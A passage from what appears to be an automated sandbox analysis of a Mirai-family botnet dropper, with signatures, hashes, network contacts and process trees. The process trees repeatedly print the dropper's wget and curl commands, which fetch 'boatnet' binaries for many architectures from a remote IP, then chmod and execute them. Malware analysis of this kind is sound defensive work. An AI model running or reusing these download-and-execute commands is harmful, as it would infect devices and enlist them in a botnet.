[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | N/A | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
/tmp/WTF
| MD5 | e3206d28c93769f5acb5e1e1d5b5f219 |
| SHA1 | 198b56e1df06819e1141c1d6e8f7ad7d1646194c |
| SHA256 | cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab |
| SHA512 | dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503 |
/tmp/WTF
| MD5 | d94c95baa8be09e30fcdc154241477c8 |
| SHA1 | d0b682898bd94b01afb6ad2f4fb813197f6a0985 |
| SHA256 | 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6 |
| SHA512 | 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | fb08806a49f2c5aa8f8ea71c0ca40395 |
| SHA1 | 411ae81e99b9c3ec9d27514a7c18cb5c63189b22 |
| SHA256 | 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c |
| SHA512 | 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3 |
memory/784-1-0x00008000-0x0001dca4-memory.dmp
memory/792-2-0x00008000-0x0001b6e4-memory.dmp
memory/797-3-0x00008000-0x000228c4-memory.dmp
memory/802-4-0x00008000-0x00026464-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 04:10
Reported
2024-11-09 04:12
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Max time network
146s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/858/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/870/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/781/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/790/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/802/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/797/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/811/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/885/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/428/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/665/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/678/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/832/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/857/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/774/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/787/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/878/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/839/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/882/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/691/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/701/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/809/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/827/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/875/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/663/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/697/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/698/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/863/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/669/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/747/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/801/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/819/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/836/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/886/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/670/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/696/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | N/A | tcp |
Files
/tmp/boatnet.x86
/tmp/WTF
memory/744-1-0x00400000-0x00451a58-memory.dmp
/tmp/WTF
/tmp/WTF
/tmp/WTF
/tmp/WTF
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 04:10
Reported
2024-11-09 04:12
Platform
debian9-mipsel-20240611-en
Max time kernel
149s
Max time network
137s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/786/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/791/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/875/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/435/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/684/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/710/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/681/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/682/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/712/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/874/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/887/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/669/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/708/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/709/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/822/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/893/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/898/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/886/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/858/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/899/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/852/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/859/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/676/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
